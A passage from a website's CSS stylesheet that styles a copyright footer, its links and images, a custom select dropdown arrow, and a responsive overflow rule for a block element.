  padding: 8px 12px;

  font-size: 13px;
  line-height: 13px;
  text-align: center;
  color: #ffffff;

  background: #000000;
}
.copyright {
  padding: 20px 0;

  font-size: 14px;
  text-align: center;
  color: #6c6e6f;
}
.copyright p {
  width: 100%;
  margin: 0;
  padding: 0;

  text-align: center;
}
.copyright br {
  display: none;
}
.copyright img {
  margin: 10px auto!important;
}
.copyright img:first-child {
  display: block!important;
}
.copyright a {
  color: #6c6e6f;
  text-decoration: none;
}
.copyright a:hover {
  color: #ff0069;
  text-decoration: none;
}

select {
  background: url(../img/select-arrow.png) #ffffff 95% center no-repeat;

  -webkit-appearance: none;
     -moz-appearance: none;
}

@media screen and (max-width: 1024px) {
  .block-10 {
    overflow-x: hidden;
  }
}